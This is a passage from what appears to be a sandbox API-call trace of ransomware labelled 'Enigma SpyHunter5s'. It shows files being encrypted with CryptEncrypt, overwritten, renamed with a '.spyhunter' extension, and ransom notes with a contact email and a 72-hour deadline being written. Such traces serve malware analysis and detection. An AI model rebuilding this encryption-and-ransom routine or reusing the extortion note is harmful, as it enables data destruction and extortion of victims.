unique ID\r\n") returned 295 [0087.393] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe74, lpOverlapped=0x0 | out: lpBuffer=0x25cfd4b*, lpNumberOfBytesWritten=0x25cfe74*=0x127, lpOverlapped=0x0) returned 1 [0087.394] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.394] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe74*=0x2ac, lpOverlapped=0x0) returned 1 [0087.394] CloseHandle (hObject=0x174) returned 1 [0087.394] GetProcessHeap () returned 0x2c0000 [0087.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373608 | out: hHeap=0x2c0000) returned 1 [0087.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe10 | out: pbBuffer=0x25cfe10) returned 1 [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe08*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe08*=0x30) returned 1 [0087.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373520 | out: hHeap=0x2c0000) returned 1 [0087.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe10 | out: pbBuffer=0x25cfe10) returned 1 [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe08*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe08*=0x30) returned 1 [0087.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.395] GetProcessHeap () returned 0x2c0000 [0087.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0087.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0087.396] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.396] WriteFile (in: hFile=0x174, lpBuffer=0x25cfd3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe68, lpOverlapped=0x0 | out: lpBuffer=0x25cfd3f*, lpNumberOfBytesWritten=0x25cfe68*=0x127, lpOverlapped=0x0) returned 1 [0087.396] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.396] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfe68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfe68*=0x2ac, lpOverlapped=0x0) returned 1 [0087.397] CloseHandle (hObject=0x174) returned 1 [0087.397] GetProcessHeap () returned 0x2c0000 [0087.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373438 | out: hHeap=0x2c0000) returned 1 [0087.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe08 | out: pbBuffer=0x25cfe08) returned 1 [0087.397] GetProcessHeap () returned 0x2c0000 [0087.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe00*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe00*=0x30) returned 1 [0087.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.477] GetProcessHeap () returned 0x2c0000 [0087.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.477] GetProcessHeap () returned 0x2c0000 [0087.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373268 | out: hHeap=0x2c0000) returned 1 [0087.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe00 | out: pbBuffer=0x25cfe00) returned 1 [0087.477] GetProcessHeap () returned 0x2c0000 [0087.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdf8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdf8*=0x30) returned 1 [0087.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.477] GetProcessHeap () returned 0x2c0000 [0087.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.477] GetProcessHeap () returned 0x2c0000 [0087.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385280 | out: hHeap=0x2c0000) returned 1 [0087.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe00 | out: pbBuffer=0x25cfe00) returned 1 [0087.478] GetProcessHeap () returned 0x2c0000 [0087.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdf8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdf8*=0x30) returned 1 [0087.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.545] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0087.545] StrStrW (lpFirst="MSOXMLED.EXE", lpSrch=".txt") returned 0x0 [0087.545] GetProcessHeap () returned 0x2c0000 [0087.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.545] ReadFile (in: hFile=0x15c, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfdbc, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x25cfdbc*=0x2800, lpOverlapped=0x0) returned 1 [0087.558] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.558] WriteFile (in: hFile=0x15c, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfdbc, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x25cfdbc*=0x2800, lpOverlapped=0x0) returned 1 [0087.560] GetProcessHeap () returned 0x2c0000 [0087.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.560] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.560] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfdfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfdbc, lpOverlapped=0x0 | out: lpBuffer=0x25cfdfc*, lpNumberOfBytesWritten=0x25cfdbc*=0x4, lpOverlapped=0x0) returned 1 [0087.560] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfdbc, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfdbc*=0x30, lpOverlapped=0x0) returned 1 [0087.560] CloseHandle (hObject=0x15c) returned 1 [0087.582] GetProcessHeap () returned 0x2c0000 [0087.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387298 [0087.583] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.spyhunter") returned 82 [0087.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe.spyhunter")) returned 1 [0087.621] GetProcessHeap () returned 0x2c0000 [0087.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387298 | out: hHeap=0x2c0000) returned 1 [0087.621] GetProcessHeap () returned 0x2c0000 [0087.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.621] GetProcessHeap () returned 0x2c0000 [0087.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3851a0 | out: hHeap=0x2c0000) returned 1 [0087.621] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdf8 | out: pbBuffer=0x25cfdf8) returned 1 [0087.621] GetProcessHeap () returned 0x2c0000 [0087.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.621] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdf0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdf0*=0x30) returned 1 [0087.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0087.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0087.683] StrStrW (lpFirst="MUOPTIN.DLL", lpSrch=".txt") returned 0x0 [0087.683] GetProcessHeap () returned 0x2c0000 [0087.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37a898 [0087.683] ReadFile (in: hFile=0x17c, lpBuffer=0x37a898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x37a898*, lpNumberOfBytesRead=0x25cfdb4*=0x2800, lpOverlapped=0x0) returned 1 [0087.728] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.728] WriteFile (in: hFile=0x17c, lpBuffer=0x37a898*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x37a898*, lpNumberOfBytesWritten=0x25cfdb4*=0x2800, lpOverlapped=0x0) returned 1 [0087.729] GetProcessHeap () returned 0x2c0000 [0087.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a898 | out: hHeap=0x2c0000) returned 1 [0087.729] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.729] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfdf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x25cfdf4*, lpNumberOfBytesWritten=0x25cfdb4*=0x4, lpOverlapped=0x0) returned 1 [0087.759] WriteFile (in: hFile=0x17c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfdb4*=0x30, lpOverlapped=0x0) returned 1 [0087.759] CloseHandle (hObject=0x17c) returned 1 [0087.762] GetProcessHeap () returned 0x2c0000 [0087.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0087.762] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.spyhunter") returned 81 [0087.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll.spyhunter")) returned 1 [0087.769] GetProcessHeap () returned 0x2c0000 [0087.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0087.769] GetProcessHeap () returned 0x2c0000 [0087.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.769] GetProcessHeap () returned 0x2c0000 [0087.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340bd8 | out: hHeap=0x2c0000) returned 1 [0087.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdf8 | out: pbBuffer=0x25cfdf8) returned 1 [0087.770] GetProcessHeap () returned 0x2c0000 [0087.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdf0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdf0*=0x30) returned 1 [0087.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.790] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0087.790] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0087.790] GetProcessHeap () returned 0x2c0000 [0087.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x378b00 [0087.790] ReadFile (in: hFile=0x16c, lpBuffer=0x378b00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x378b00*, lpNumberOfBytesRead=0x25cfdb4*=0x8f8, lpOverlapped=0x0) returned 1 [0087.810] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.810] WriteFile (in: hFile=0x16c, lpBuffer=0x378b00*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x378b00*, lpNumberOfBytesWritten=0x25cfdb4*=0x8f8, lpOverlapped=0x0) returned 1 [0087.810] GetProcessHeap () returned 0x2c0000 [0087.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378b00 | out: hHeap=0x2c0000) returned 1 [0087.810] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.810] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfdf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x25cfdf4*, lpNumberOfBytesWritten=0x25cfdb4*=0x4, lpOverlapped=0x0) returned 1 [0087.810] WriteFile (in: hFile=0x16c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfdb4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfdb4*=0x30, lpOverlapped=0x0) returned 1 [0087.811] CloseHandle (hObject=0x16c) returned 1 [0087.817] GetProcessHeap () returned 0x2c0000 [0087.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0087.817] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.spyhunter") returned 115 [0087.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.spyhunter")) returned 1 [0087.928] GetProcessHeap () returned 0x2c0000 [0087.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0087.928] GetProcessHeap () returned 0x2c0000 [0087.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.929] GetProcessHeap () returned 0x2c0000 [0087.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353cd8 | out: hHeap=0x2c0000) returned 1 [0087.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdf0 | out: pbBuffer=0x25cfdf0) returned 1 [0087.929] GetProcessHeap () returned 0x2c0000 [0087.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfde8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfde8*=0x30) returned 1 [0087.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0087.951] StrStrW (lpFirst="OSETUP.DLL", lpSrch=".txt") returned 0x0 [0087.951] GetProcessHeap () returned 0x2c0000 [0087.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0087.952] ReadFile (in: hFile=0x16c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfdac*=0x2800, lpOverlapped=0x0) returned 1 [0087.961] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.961] WriteFile (in: hFile=0x16c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfdac*=0x2800, lpOverlapped=0x0) returned 1 [0087.961] GetProcessHeap () returned 0x2c0000 [0087.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0087.962] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.962] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfdec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x25cfdec*, lpNumberOfBytesWritten=0x25cfdac*=0x4, lpOverlapped=0x0) returned 1 [0087.973] WriteFile (in: hFile=0x16c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfdac*=0x30, lpOverlapped=0x0) returned 1 [0087.973] CloseHandle (hObject=0x16c) returned 1 [0088.262] GetProcessHeap () returned 0x2c0000 [0088.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0088.262] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.spyhunter") returned 104 [0088.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.spyhunter")) returned 1 [0088.827] GetProcessHeap () returned 0x2c0000 [0088.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0088.828] GetProcessHeap () returned 0x2c0000 [0088.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0088.828] GetProcessHeap () returned 0x2c0000 [0088.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375938 | out: hHeap=0x2c0000) returned 1 [0088.828] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdf0 | out: pbBuffer=0x25cfdf0) returned 1 [0088.828] GetProcessHeap () returned 0x2c0000 [0088.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0088.828] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfde8*=0x20, 